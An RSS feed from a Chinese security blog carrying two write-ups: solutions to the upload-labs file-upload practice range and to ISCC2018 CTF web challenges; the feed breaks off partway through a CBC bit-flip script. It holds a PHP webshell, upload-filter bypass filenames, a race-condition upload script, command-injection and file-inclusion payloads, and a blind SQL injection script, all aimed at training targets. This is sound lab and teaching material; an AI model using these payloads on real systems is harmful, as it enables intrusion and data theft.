<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Writeup &#8211; ChaBug安全</title>
	<atom:link href="/tags/writeup/feed" rel="self" type="application/rss+xml" />
	<link>/</link>
	<description>一个分享知识、结识伙伴、资源共享的博客</description>
	<lastBuildDate>Thu, 26 Jul 2018 03:17:44 +0000</lastBuildDate>
	<language>zh-CN</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=5.5.5</generator>
	<item>
		<title>upload-labs-writeup：upload-labs 上传漏洞靶场的解题方法</title>
		<link>/web/470.html</link>
					<comments>/web/470.html#comments</comments>
		
		<dc:creator><![CDATA[Y4er]]></dc:creator>
		<pubDate>Tue, 24 Jul 2018 06:44:40 +0000</pubDate>
				<category><![CDATA[渗透测试]]></category>
		<category><![CDATA[upload]]></category>
		<category><![CDATA[Writeup]]></category>
		<category><![CDATA[上传]]></category>
		<category><![CDATA[突破]]></category>
		<category><![CDATA[笔记]]></category>
		<guid isPermaLink="false">/?p=470</guid>

					<description><![CDATA[0x00：前言 本篇文章主要记录绕过一个基于php语言的上传漏洞的靶场项目upload-labs (最新commit17ec936) 的19个上传关卡的方法。 文章适合有一定上传绕...]]></description>
										<content:encoded><![CDATA[<h3>0x00：前言</h3>
<p>本篇文章主要记录绕过一个基于php语言的<span class="wpcom_tag_link"><a href="/tags/%e4%b8%8a%e4%bc%a0" title="上传" target="_blank">上传</a></span>漏洞的靶场项目<a href="https://github.com/c0ny1/upload-labs">upload-labs</a> (最新commit<a href="https://github.com/c0ny1/upload-labs/commit/17ec93650d05d956e5868518cd6e8e36085ab2a3">17ec936</a>) 的19个上传关卡的方法。</p>
<p>文章适合有一定上传绕过知识基础的读者阅读，绕过原理请参考其它文章和项目源码，限于篇幅文章中不展开解释。</p>
<h3><a id="user-content-0x01测试配置" class="anchor" href="https://github.com/LandGrey/upload-labs-writeup/#0x01%E6%B5%8B%E8%AF%95%E9%85%8D%E7%BD%AE" aria-hidden="true"></a>0x01：测试配置</h3>
<p>可直接下载作者的配置好的PHPStudy<a href="https://github.com/c0ny1/upload-labs/releases">靶场运行环境</a>，节省时间。</p>
<table>
<thead>
<tr>
<th align="left">浏览器</th>
<th align="left">Firefox</th>
</tr>
</thead>
<tbody>
<tr>
<td align="left"><strong>插件</strong></td>
<td align="left">NoScript</td>
</tr>
<tr>
<td align="left"><strong>插件</strong></td>
<td align="left">HackBar</td>
</tr>
<tr>
<td align="left"><strong>抓包工具</strong></td>
<td align="left">Burpsuite Pro</td>
</tr>
<tr>
<td align="left"><strong>Webshell代码</strong></td>
<td align="left"><code>&lt;?php assert($_POST["LandGrey"])?&gt;</code></td>
</tr>
</tbody>
</table>
<h3><a id="user-content-0x02绕过方法" class="anchor" href="https://github.com/LandGrey/upload-labs-writeup/#0x02%E7%BB%95%E8%BF%87%E6%96%B9%E6%B3%95" aria-hidden="true"></a>0x02：绕过方法</h3>
<h4><a id="user-content-pass-01" class="anchor" href="https://github.com/LandGrey/upload-labs-writeup/#pass-01" aria-hidden="true"></a>Pass-01</h4>
<p>前端禁用JS，直接上传Webshell</p>
<p><a href="https://github.com/LandGrey/upload-labs-writeup/blob/master/image/01-1.png" target="_blank" rel="noopener"><img src="https://github.com/LandGrey/upload-labs-writeup/raw/master/image/01-1.png" alt="" /></a></p>
<h4><a id="user-content-pass-02" class="anchor" href="https://github.com/LandGrey/upload-labs-writeup/#pass-02" aria-hidden="true"></a>Pass-02</h4>
<p>截断上传数据包，修改Content-Type为<code>image/gif</code>，然后放行数据包</p>
<p><a href="https://github.com/LandGrey/upload-labs-writeup/blob/master/image/02-1.png" target="_blank" rel="noopener"><img src="https://github.com/LandGrey/upload-labs-writeup/raw/master/image/02-1.png" alt="" /></a></p>
<h4><a id="user-content-pass-03" class="anchor" href="https://github.com/LandGrey/upload-labs-writeup/#pass-03" aria-hidden="true"></a>Pass-03</h4>
<p>重写文件解析规则绕过。上传先上传一个名为<code>.htaccess</code>文件，内容如下：</p>
<pre><code>&lt;FilesMatch "03.jpg"&gt;
SetHandler application/x-httpd-php
&lt;/FilesMatch&gt;
</code></pre>
<p><a href="https://github.com/LandGrey/upload-labs-writeup/blob/master/image/03-1.png" target="_blank" rel="noopener"><img src="https://github.com/LandGrey/upload-labs-writeup/raw/master/image/03-1.png" alt="" /></a></p>
<p>然后再上传一个<code>03.jpg</code></p>
<p><a href="https://github.com/LandGrey/upload-labs-writeup/blob/master/image/03-2.png" target="_blank" rel="noopener"><img src="https://github.com/LandGrey/upload-labs-writeup/raw/master/image/03-2.png" alt="" /></a></p>
<p>执行上传的<code>03.jpg</code>脚本</p>
<p><a href="https://github.com/LandGrey/upload-labs-writeup/blob/master/image/03-3.png" target="_blank" rel="noopener"><img src="https://github.com/LandGrey/upload-labs-writeup/raw/master/image/03-3.png" alt="" /></a></p>
<h4><a id="user-content-pass-04" class="anchor" href="https://github.com/LandGrey/upload-labs-writeup/#pass-04" aria-hidden="true"></a>Pass-04</h4>
<p>利用PHP 和 Windows环境的叠加特性，以下符号在正则匹配时的相等性：</p>
<pre><code>双引号"     =   点号.
大于符号&gt;   =   问号?
小于符号&lt;   =   星号*
</code></pre>
<p>先上传一个名为<code>4.php:.jpg</code>的文件，上传成功后会生成<code>4.php</code>的空文件，大小为0KB.</p>
<p><a href="https://github.com/LandGrey/upload-labs-writeup/blob/master/image/04-1.png" target="_blank" rel="noopener"><img src="https://github.com/LandGrey/upload-labs-writeup/raw/master/image/04-1.png" alt="" /></a></p>
<p>然后将文件名改为<code>4.&lt;</code>或<code>4.&lt;&lt;&lt;</code>或<code>4.&gt;&gt;&gt;</code>或<code>4.&gt;&gt;&lt;</code>后再次上传，重写<code>4.php</code>文件内容，Webshell代码就会写入原来的<code>4.php</code>空文件中。</p>
<p><a href="https://github.com/LandGrey/upload-labs-writeup/blob/master/image/04-2.png" target="_blank" rel="noopener"><img src="https://github.com/LandGrey/upload-labs-writeup/raw/master/image/04-2.png" alt="" /></a></p>
<h4><a id="user-content-pass-05" class="anchor" href="https://github.com/LandGrey/upload-labs-writeup/#pass-05" aria-hidden="true"></a>Pass-05</h4>
<p>文件名后缀大小写混合绕过。<code>05.php</code>改成<code>05.phP</code>然后上传</p>
<p><a href="https://github.com/LandGrey/upload-labs-writeup/blob/master/image/05-1.png" target="_blank" rel="noopener"><img src="https://github.com/LandGrey/upload-labs-writeup/raw/master/image/05-1.png" alt="" /></a></p>
<h4><a id="user-content-pass-06" class="anchor" href="https://github.com/LandGrey/upload-labs-writeup/#pass-06" aria-hidden="true"></a>Pass-06</h4>
<p>利用Windows系统的文件名特性。文件名最后增加<strong>点和空格</strong>，写成<code>06.php.</code>，上传后保存在Windows系统上的文件名最后的一个<code>.</code>会被去掉，实际上保存的文件名就是<code>06.php</code></p>
<p><a href="https://github.com/LandGrey/upload-labs-writeup/blob/master/image/06-1.png" target="_blank" rel="noopener"><img src="https://github.com/LandGrey/upload-labs-writeup/raw/master/image/06-1.png" alt="" /></a></p>
<h4><a id="user-content-pass-07" class="anchor" href="https://github.com/LandGrey/upload-labs-writeup/#pass-07" aria-hidden="true"></a>Pass-07</h4>
<p>原理同<strong>Pass-06</strong>，文件名后加点，改成<code>07.php.</code></p>
<p><a href="https://github.com/LandGrey/upload-labs-writeup/blob/master/image/07-1.png" target="_blank" rel="noopener"><img src="https://github.com/LandGrey/upload-labs-writeup/raw/master/image/07-1.png" alt="" /></a></p>
<h4><a id="user-content-pass-08" class="anchor" href="https://github.com/LandGrey/upload-labs-writeup/#pass-08" aria-hidden="true"></a>Pass-08</h4>
<p>Windows文件流特性绕过，文件名改成<code>08.php::$DATA</code>，上传成功后保存的文件名其实是<code>08.php</code></p>
<p><a href="https://github.com/LandGrey/upload-labs-writeup/blob/master/image/08-1.png" target="_blank" rel="noopener"><img src="https://github.com/LandGrey/upload-labs-writeup/raw/master/image/08-1.png" alt="" /></a></p>
<h4><a id="user-content-pass-09" class="anchor" href="https://github.com/LandGrey/upload-labs-writeup/#pass-09" aria-hidden="true"></a>Pass-09</h4>
<p><strong>原理同Pass-06</strong>，上传文件名后加上<strong>点+空格+点</strong>，改为<code>09.php. .</code></p>
<p><a href="https://github.com/LandGrey/upload-labs-writeup/blob/master/image/09-1.png" target="_blank" rel="noopener"><img src="https://github.com/LandGrey/upload-labs-writeup/raw/master/image/09-1.png" alt="" /></a></p>
<h4><a id="user-content-pass-10" class="anchor" href="https://github.com/LandGrey/upload-labs-writeup/#pass-10" aria-hidden="true"></a>Pass-10</h4>
<p>双写文件名绕过，文件名改成<code>10.pphphp</code></p>
<p><a href="https://github.com/LandGrey/upload-labs-writeup/blob/master/image/10-1.png" target="_blank" rel="noopener"><img src="https://github.com/LandGrey/upload-labs-writeup/raw/master/image/10-1.png" alt="" /></a></p>
<h4><a id="user-content-pass-11" class="anchor" href="https://github.com/LandGrey/upload-labs-writeup/#pass-11" aria-hidden="true"></a>Pass-11</h4>
<p>上传路径名%00截断绕过。上传的文件名写成<code>11.jpg</code>, save_path改成<code>../<span class="wpcom_tag_link"><a href="/tags/upload" title="upload" target="_blank">upload</a></span>/11.php%00</code>，最后保存下来的文件就是<code>11.php</code></p>
<p><a href="https://github.com/LandGrey/upload-labs-writeup/blob/master/image/11-1.png" target="_blank" rel="noopener"><img src="https://github.com/LandGrey/upload-labs-writeup/raw/master/image/11-1.png" alt="" /></a></p>
<h4><a id="user-content-pass-12" class="anchor" href="https://github.com/LandGrey/upload-labs-writeup/#pass-12" aria-hidden="true"></a>Pass-12</h4>
<p>php.ini设置 <code>magic_quotes_gpc = Off</code></p>
<p>原理同<strong>Pass-11</strong>，上传路径0x00绕过。利用Burpsuite的Hex功能将save_path改成<code>../upload/12.php【二进制00】</code>形式</p>
<p><a href="https://github.com/LandGrey/upload-labs-writeup/blob/master/image/12-1.png" target="_blank" rel="noopener"><img src="https://github.com/LandGrey/upload-labs-writeup/raw/master/image/12-1.png" alt="" /></a></p>
<h4><a id="user-content-pass-13" class="anchor" href="https://github.com/LandGrey/upload-labs-writeup/#pass-13" aria-hidden="true"></a>Pass-13</h4>
<p>绕过文件头检查，添加GIF图片的文件头<code>GIF89a</code>，绕过GIF图片检查。</p>
<p><a href="https://github.com/LandGrey/upload-labs-writeup/blob/master/image/13-1.png" target="_blank" rel="noopener"><img src="https://github.com/LandGrey/upload-labs-writeup/raw/master/image/13-1.png" alt="" /></a></p>
<p>使用命令<code>copy normal.jpg /b + shell.php /a webshell.jpg</code>，将php一句话追加到jpg图片末尾，代码不全的话，人工补充完整。形成一个包含Webshell代码的新jpg图片，然后直接上传即可。<a href="https://github.com/LandGrey/upload-labs-writeup/blob/master/webshell/webshell.jpg">JPG一句话shell参考示例</a></p>
<p><a href="https://github.com/LandGrey/upload-labs-writeup/blob/master/image/13-2.png" target="_blank" rel="noopener"><img src="https://github.com/LandGrey/upload-labs-writeup/raw/master/image/13-2.png" alt="" /></a></p>
<p>png图片处理方式同上。<a href="https://github.com/LandGrey/upload-labs-writeup/blob/master/webshell/webshell.png">PNG一句话shell参考示例</a></p>
<p><a href="https://github.com/LandGrey/upload-labs-writeup/blob/master/image/13-3.png" target="_blank" rel="noopener"><img src="https://github.com/LandGrey/upload-labs-writeup/raw/master/image/13-3.png" alt="" /></a></p>
<h4><a id="user-content-pass-14" class="anchor" href="https://github.com/LandGrey/upload-labs-writeup/#pass-14" aria-hidden="true"></a>Pass-14</h4>
<p>原理和示例同<strong>Pass-13</strong>，添加GIF图片的文件头绕过检查</p>
<p><a href="https://github.com/LandGrey/upload-labs-writeup/blob/master/image/14-1.png" target="_blank" rel="noopener"><img src="https://github.com/LandGrey/upload-labs-writeup/raw/master/image/14-1.png" alt="" /></a></p>
<p>png图片webshell上传同<strong>Pass-13</strong>。</p>
<p>jpg/jpeg图片webshell上传存在问题，正常的图片也上传不了，等待作者调整。</p>
<h4><a id="user-content-pass-15" class="anchor" href="https://github.com/LandGrey/upload-labs-writeup/#pass-15" aria-hidden="true"></a>Pass-15</h4>
<p>原理同<strong>Pass-13</strong>，添加GIF图片的文件头绕过检查</p>
<p><a href="https://github.com/LandGrey/upload-labs-writeup/blob/master/image/15-1.png" target="_blank" rel="noopener"><img src="https://github.com/LandGrey/upload-labs-writeup/raw/master/image/15-1.png" alt="" /></a></p>
<p>png图片webshell上传同<strong>Pass-13</strong>。</p>
<p>jpg/jpeg图片webshell上传同<strong>Pass-13</strong>。</p>
<h4><a id="user-content-pass-16" class="anchor" href="https://github.com/LandGrey/upload-labs-writeup/#pass-16" aria-hidden="true"></a>Pass-16</h4>
<p>原理：将一个正常显示的图片，上传到服务器。寻找图片被渲染后与原始图片部分对比仍然相同的数据块部分，将Webshell代码插在该部分，然后上传。具体实现需要自己编写Python程序，人工尝试基本是不可能构造出能绕过渲染函数的图片webshell的。</p>
<p>这里提供一个包含一句话webshell代码并可以绕过PHP的imagecreatefromgif函数的GIF图片<a href="https://github.com/LandGrey/upload-labs-writeup/blob/master/webshell/bypass-imagecreatefromgif-pass-00.gif">示例</a>。</p>
<p><a href="https://github.com/LandGrey/upload-labs-writeup/blob/master/image/16-1.png" target="_blank" rel="noopener"><img src="https://github.com/LandGrey/upload-labs-writeup/raw/master/image/16-1.png" alt="" /></a></p>
<p>打开被渲染后的图片，Webshell代码仍然存在</p>
<p><a href="https://github.com/LandGrey/upload-labs-writeup/blob/master/image/16-2.png" target="_blank" rel="noopener"><img src="https://github.com/LandGrey/upload-labs-writeup/raw/master/image/16-2.png" alt="" /></a></p>
<p>提供一个jpg格式图片绕过imagecreatefromjpeg函数渲染的一个<a href="https://github.com/LandGrey/upload-labs-writeup/blob/master/webshell/bypass-imagecreatefromjpeg-pass-LandGrey.jpg">示例文件</a>。 直接上传示例文件会触发Warning警告，并提示文件不是jpg格式的图片。但是实际上已经上传成功，而且示例文件名没有改变。</p>
<p><a href="https://github.com/LandGrey/upload-labs-writeup/blob/master/image/16-3.png" target="_blank" rel="noopener"><img src="https://github.com/LandGrey/upload-labs-writeup/raw/master/image/16-3.png" alt="" /></a></p>
<p><a href="https://github.com/LandGrey/upload-labs-writeup/blob/master/image/16-4.png" target="_blank" rel="noopener"><img src="https://github.com/LandGrey/upload-labs-writeup/raw/master/image/16-4.png" alt="" /></a></p>
<p>从上面上传jpg图片可以看到我们想复杂了，程序没有对渲染异常进行处理，直接在正常png图片内插入webshell代码，然后上传<a href="https://github.com/LandGrey/upload-labs-writeup/blob/master/webshell/bypass-imagecreatefrompng-pass-LandGrey.png">示例文件</a>即可，并不需要图片是正常的图片。</p>
<p><a href="https://github.com/LandGrey/upload-labs-writeup/blob/master/image/16-5.png" target="_blank" rel="noopener"><img src="https://github.com/LandGrey/upload-labs-writeup/raw/master/image/16-5.png" alt="" /></a></p>
<p>程序依然没有对文件重命名，携带webshell的无效损坏png图片直接被上传成功。</p>
<p><a href="https://github.com/LandGrey/upload-labs-writeup/blob/master/image/16-6.png" target="_blank" rel="noopener"><img src="https://github.com/LandGrey/upload-labs-writeup/raw/master/image/16-6.png" alt="" /></a></p>
<h4><a id="user-content-pass-17" class="anchor" href="https://github.com/LandGrey/upload-labs-writeup/#pass-17" aria-hidden="true"></a>Pass-17</h4>
<p>利用条件竞争删除文件时间差绕过。使用命令<code>pip install hackhttp</code>安装<a href="https://github.com/BugScanTeam/hackhttp">hackhttp</a>模块，运行下面的Python代码即可。如果还是删除太快，可以适当调整线程并发数。</p>
<pre class="lang:default decode:true " >#!/usr/bin/env python
# coding:utf-8
# Build By LandGrey

import hackhttp
from multiprocessing.dummy import Pool as ThreadPool


def upload(lists):
    hh = hackhttp.hackhttp()
    raw = """POST /upload-labs/Pass-17/index.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/upload-labs/Pass-17/index.php
Cookie: pass=17
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=---------------------------6696274297634
Content-Length: 341

-----------------------------6696274297634
Content-Disposition: form-data; name="upload_file"; filename="17.php"
Content-Type: application/octet-stream

&lt;?php assert($_POST["LandGrey"])?&gt;
-----------------------------6696274297634
Content-Disposition: form-data; name="submit"

上传
-----------------------------6696274297634--
"""
    code, head, html, redirect, log = hh.http('http://127.0.0.1/upload-labs/Pass-17/index.php', raw=raw)
    print(str(code) + "\r")


pool = ThreadPool(10)
pool.map(upload, range(10000))
pool.close()
pool.join()</pre>
<p>在脚本运行的时候，访问Webshell</p>
<p><a href="https://github.com/LandGrey/upload-labs-writeup/blob/master/image/17-1.png" target="_blank" rel="noopener"><img src="https://github.com/LandGrey/upload-labs-writeup/raw/master/image/17-1.png" alt="" /></a></p>
<h4><a id="user-content-pass-18" class="anchor" href="https://github.com/LandGrey/upload-labs-writeup/#pass-18" aria-hidden="true"></a>Pass-18</h4>
<p>刚开始没有找到绕过方法，最后下载作者Github提供的打包环境，利用上传重命名竞争+Apache解析漏洞，成功绕过。</p>
<p>上传名字为<code>18.php.7Z</code>的文件，快速重复提交该数据包，会提示文件已经被上传，但没有被重命名。</p>
<p><a href="https://github.com/LandGrey/upload-labs-writeup/blob/master/image/18-1.png" target="_blank" rel="noopener"><img src="https://github.com/LandGrey/upload-labs-writeup/raw/master/image/18-1.png" alt="" /></a></p>
<p>快速提交上面的数据包，可以让文件名字不被重命名上传成功。</p>
<p><a href="https://github.com/LandGrey/upload-labs-writeup/blob/master/image/18-2.png" target="_blank" rel="noopener"><img src="https://github.com/LandGrey/upload-labs-writeup/raw/master/image/18-2.png" alt="" /></a></p>
<p>然后利用Apache的解析漏洞，即可获得shell</p>
<p><a href="https://github.com/LandGrey/upload-labs-writeup/blob/master/image/18-3.png" target="_blank" rel="noopener"><img src="https://github.com/LandGrey/upload-labs-writeup/raw/master/image/18-3.png" alt="" /></a></p>
<h4><a id="user-content-pass-19" class="anchor" href="https://github.com/LandGrey/upload-labs-writeup/#pass-19" aria-hidden="true"></a>Pass-19</h4>
<p>原理同<strong>Pass-11</strong>，上传的文件名用0x00绕过。改成<code>19.php【二进制00】.1.jpg</code></p>
<p><a href="https://github.com/LandGrey/upload-labs-writeup/blob/master/image/19-1.png" target="_blank" rel="noopener"><img src="https://github.com/LandGrey/upload-labs-writeup/raw/master/image/19-1.png" alt="" /></a></p>
<h3><a id="user-content-0x03后记" class="anchor" href="https://github.com/LandGrey/upload-labs-writeup/#0x03%E5%90%8E%E8%AE%B0" aria-hidden="true"></a>0x03：后记</h3>
<p>可以发现以上绕过方法中有些是重复的，有些是意外情况，可能与项目作者的本意不符，故本文仅作为参考使用。</p>
<p>等作者修复代码逻辑后，本文也会适时更新。</p>
]]></content:encoded>
					
					<wfw:commentRss>/web/470.html/feed</wfw:commentRss>
			<slash:comments>5</slash:comments>
		
		
			</item>
		<item>
		<title>ISCC2018 writeup(web)</title>
		<link>/ctf/423.html</link>
		
		<dc:creator><![CDATA[s1ye]]></dc:creator>
		<pubDate>Fri, 25 May 2018 12:08:55 +0000</pubDate>
				<category><![CDATA[CTF笔记]]></category>
		<category><![CDATA[CTF]]></category>
		<category><![CDATA[iscc2018]]></category>
		<category><![CDATA[Writeup]]></category>
		<guid isPermaLink="false">/?p=322</guid>

					<description><![CDATA[ 比较数字大小 F12 修改maxlength为4 web01 strcmp()函数遇到数组会返回NULL 而PHP是弱类型语言  在==比较的时候，如果有数值的话会先将字符串转换...]]></description>
										<content:encoded><![CDATA[<h2><span style="color: black; font-family: Helvetica;"><span style="font-size: 8pt;"> 比较数字大小</span><span style="font-size: 8pt;"><br />
</span></span></h2>
<p><span style="color: black; font-family: Helvetica;"><span style="font-size: 14pt;">F12 修改maxlength为4</span><span style="font-size: 8pt;"><br />
</span></span></p>
<p><img src="/wp-content/uploads/2018/05/052518_1206_1.png" alt="" /><span style="color: black; font-family: Helvetica; font-size: 8pt;"><br />
</span></p>
<p><span style="color: black; font-family: Helvetica;"><span style="font-size: 14pt;">web01</span><span style="font-size: 8pt;"><br />
</span></span></p>
<p><img src="/wp-content/uploads/2018/05/052518_1206_2.png" alt="" /><span style="color: black; font-family: Helvetica; font-size: 8pt;"><br />
</span></p>
<p><span style="color: black; font-family: Helvetica; font-size: 8pt;">strcmp()函数遇到数组会返回NULL 而PHP是弱类型语言  在==比较的时候，如果有数值的话会先将字符串转换为数值在进行比较，而NULL转换成数值为0，所以绕过题目限制。<br />
</span></p>
<p><span style="color: black; font-family: Helvetica; font-size: 8pt;">payload:  get: /?password[]=1<br />
</span></p>
<p><img src="/wp-content/uploads/2018/05/052518_1206_3.png" alt="" /><span style="color: black; font-family: Helvetica; font-size: 8pt;"><br />
</span></p>
<p><span style="color: black; font-family: Helvetica;"><span style="font-size: 14pt;">本地的诱惑</span><span style="font-size: 8pt;"><br />
</span></span></p>
<p><span style="color: black; font-family: Helvetica; font-size: 8pt;">右键查看源代码即可。<br />
</span></p>
<p><span style="color: black; font-family: Helvetica;"><span style="font-size: 14pt;">你能跨过去吗？</span><span style="font-size: 8pt;"><br />
</span></span></p>
<p><img src="/wp-content/uploads/2018/05/052518_1206_4.png" alt="" /><span style="color: black; font-family: Helvetica; font-size: 8pt;"><br />
</span></p>
<p><span style="color: black; font-family: Helvetica; font-size: 8pt;"> 复制callback参数内容 base64解码得到&lt;script&gt;alert(&#8220;key:/%nsfocusXSStest%/&#8221;)&lt;/script&gt;  复制key的内容 提交得到flag；<br />
</span></p>
<p><img src="/wp-content/uploads/2018/05/052518_1206_5.png" alt="" /><span style="color: black; font-family: Helvetica; font-size: 8pt;"><br />
</span></p>
<p><span style="color: black; font-family: Helvetica;"><span style="font-size: 14pt;">一切都是套路</span><span style="font-size: 8pt;"><br />
</span></span></p>
<p><span style="color: black; font-family: Helvetica; font-size: 8pt;">访问/index.php.txt得到源代码:<br />
</span></p>
<p><img src="/wp-content/uploads/2018/05/052518_1206_6.png" alt="" /><span style="color: black; font-family: Helvetica; font-size: 8pt;"><br />
</span></p>
<p><span style="color: black; font-family: Helvetica; font-size: 8pt;">变量覆盖漏洞($$):<br />
</span></p>
<p><span style="color: black; font-family: Helvetica; font-size: 8pt;">get: ?_200=flag<br />
</span></p>
<p><span style="color: black; font-family: Helvetica; font-size: 8pt;">post: flag=x<br />
</span></p>
<p><img src="/wp-content/uploads/2018/05/052518_1206_7.png" alt="" /><span style="color: black; font-family: Helvetica; font-size: 8pt;"><br />
</span></p>
<p><span style="color: black; font-family: Helvetica;"><span style="font-size: 14pt;">你能绕过吗</span><span style="font-size: 8pt;"><br />
</span></span></p>
<p><img src="/wp-content/uploads/2018/05/052518_1206_8.png" alt="" /><span style="color: black; font-family: Helvetica; font-size: 8pt;"><br />
</span></p>
<p><span style="color: black; font-family: Helvetica; font-size: 8pt;">更改f参数的内容发现会报错，猜测是文件包含漏洞<br />
</span></p>
<p><img src="/wp-content/uploads/2018/05/052518_1206_9.png" alt="" /><span style="color: black; font-family: Helvetica; font-size: 8pt;"><br />
</span></p>
<p><span style="color: black; font-family: Helvetica; font-size: 8pt;">用php伪协议来读取flag.经过测试发现题目过滤了php 所以用PHP://filter/convert.base64-encode/resource=index,解码读到flag。<br />
</span></p>
<p><img src="/wp-content/uploads/2018/05/052518_1206_10.png" alt="" /><span style="color: black; font-family: Helvetica; font-size: 8pt;"><br />
</span></p>
<p><span style="color: black; font-family: Helvetica;"><span style="font-size: 8pt;"> </span><span style="font-size: 14pt;">web02</span><span style="font-size: 8pt;"><br />
</span></span></p>
<p><img src="/wp-content/uploads/2018/05/052518_1206_11.png" alt="" /><span style="color: black; font-family: Helvetica; font-size: 8pt;"><br />
</span></p>
<p><span style="color: black; font-family: Helvetica; font-size: 8pt;"> burp截断 利用client-ip: 127.0.0.1修改客户端ip以欺骗服务器 得到flag。<br />
</span></p>
<p><img src="/wp-content/uploads/2018/05/052518_1206_12.png" alt="" /><span style="color: black; font-family: Helvetica; font-size: 8pt;"><br />
</span></p>
<h3><span style="color: black; font-family: Helvetica; font-size: 12pt;">请ping我的ip 看你能Ping通吗？<br />
</span></h3>
<p><span style="color: black; font-family: Helvetica; font-size: 8pt;"> 根据题目要求 ping 猜测是命令注入漏洞，过滤了; &amp; |等特殊符号  利用%0a(换行)进行绕过<br />
</span></p>
<p><span style="color: black; font-family: Helvetica; font-size: 8pt;">用  ls / 命令查看目录<br />
</span></p>
<p><img src="/wp-content/uploads/2018/05/052518_1206_13.png" alt="" /><span style="color: black; font-family: Helvetica; font-size: 8pt;"><br />
</span></p>
<p><span style="color: black; font-family: Helvetica; font-size: 8pt;">最后在 /home目录下发现flag   payload: /?ip=127.0.0.1%0a cat /home/flag得到flag<br />
</span></p>
<p><img src="/wp-content/uploads/2018/05/052518_1206_14.png" alt="" /><span style="color: black; font-family: Helvetica; font-size: 8pt;"><br />
</span></p>
<h3><span style="color: black; font-family: Helvetica; font-size: 12pt;">Please give me username and password!<br />
</span></h3>
<p><span style="color: black; font-family: Helvetica; font-size: 8pt;">/index.php.txt 页面泄漏源代码，利用php弱类型进行绕过;<br />
</span></p>
<p><span style="color: black; font-family: Helvetica; font-size: 8pt;">?username[]=0&amp;password=1e9<br />
</span></p>
<p><img src="/wp-content/uploads/2018/05/052518_1206_15.png" alt="" /><span style="color: black; font-family: Helvetica; font-size: 8pt;"><br />
</span></p>
<h3><span style="color: black; font-family: Helvetica; font-size: 12pt;">SQL注入的艺术<br />
</span></h3>
<p><span style="color: black; font-family: Helvetica; font-size: 8pt;"> <a href="/wp-content/uploads/2018/05/052518_1206_16.png"><img loading="lazy" class="alignnone size-full wp-image-303" src="/wp-content/uploads/2018/05/052518_1206_16.png" alt="" width="1504" height="827" /></a></span></p>
<p><span style="color: black; font-family: Helvetica; font-size: 8pt;">点击个人信息页面,宽字节注入，可以盲注也可以联合查询注入。 当时写了个脚本盲注</span></p>
<pre class="lang:default decode:true ">import re
import requests
cname = ''
flag = ''
url = 'http://118.190.152.202:8015/index.php?id=1%df'
payload = "' and ascii(substr(({p}),{m},1))={n}%23"
list = [64,94,96,124,176,40,41,48,49,50,51,52,53,54,55,56,57,173,175,95,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,44]
for  i in range(1,46):
    for ss in list:
        p = payload.format(p='select group_concat(column_name) from information_schema.columns where table_name = 0x61646d696e73',m=i,n=ss)
        u = requests.get(url+p)
        if "head.jpg" in u.content:
            cname += chr(ss)
            print cname
            break
for i in range(1,23):
    for l in list:
        pp = payload.format(p='select flag from admins',m=i,n=l)
        u = requests.get(url+pp)
        if "head.jpg" in u.content:
            flag += chr(l)
            print flag
            break</pre>
<p>&nbsp;</p>
<p><span style="color: black; font-family: Helvetica; font-size: 8pt;"> <img src="/wp-content/uploads/2018/05/052518_1206_17.png" alt="" /><br />
</span></p>
<h3><span style="color: black; font-family: Helvetica; font-size: 12pt;">试试看<br />
</span></h3>
<p><span style="color: black; font-family: Helvetica; font-size: 8pt;">/show.php?img=1.jpg  复制图片地址  文件包含漏洞。<br />
</span></p>
<p><span style="color: black; font-family: Helvetica; font-size: 8pt;">由于不包含.jpg文件提示File not found！ resource可以包含两个文件 所以绕过<br />
</span></p>
<p><span style="color: black; font-family: Helvetica; font-size: 8pt;">payload:  php://filter/convert.base64-encode/resource=../flag.php|1.jpg 查看源代码得到flag。<br />
</span></p>
<p><img src="/wp-content/uploads/2018/05/052518_1206_18.png" alt="" /><span style="color: black; font-family: Helvetica; font-size: 8pt;"><br />
</span></p>
<h3><span style="color: black; font-family: Helvetica; font-size: 12pt;">Collide<br />
</span></h3>
<p><img src="/wp-content/uploads/2018/05/052518_1206_19.png" alt="" /><span style="color: black; font-family: Helvetica; font-size: 8pt;"><br />
</span></p>
<p><span style="color: black; font-family: Helvetica; font-size: 8pt;"> 直接给出源代码，由于key的值不知道 但是我们知道key的 长度为46，利用hash长度扩展攻击<br />
</span></p>
<p><span style="color: black; font-family: Helvetica; font-size: 8pt;">编码后的username:  guest%80%00%00%00%00%98%01%00%00%00%00%00%00admin<br />
</span></p>
<p><span style="color: black; font-family: Helvetica; font-size: 8pt;"> 用hashdump求出md5值 5f585093a7fe86971766c3d25c43d0eb<br />
</span></p>
<p><span style="color: black; font-family: Helvetica; font-size: 8pt;"> <img src="/wp-content/uploads/2018/05/052518_1206_20.png" alt="" /><br />
</span></p>
<h3><span style="color: black; font-family: Helvetica; font-size: 12pt;">Only admin can see flag<br />
</span></h3>
<p><span style="color: black; font-family: Helvetica; font-size: 8pt;">cbc字节翻转攻击<br />
</span></p>
<p><span style="color: black; font-family: Helvetica; font-size: 8pt;">/index.txt看到源代码 搜了一下 发现cbc字节翻转攻击 附带脚本。</span></p>
<pre class="lang:default decode:true ">import urllib
import base64
#a:2:{s:8:"userna
#me";s:5:"admiN";
#s:8:"password";s
#:6:"123456";}
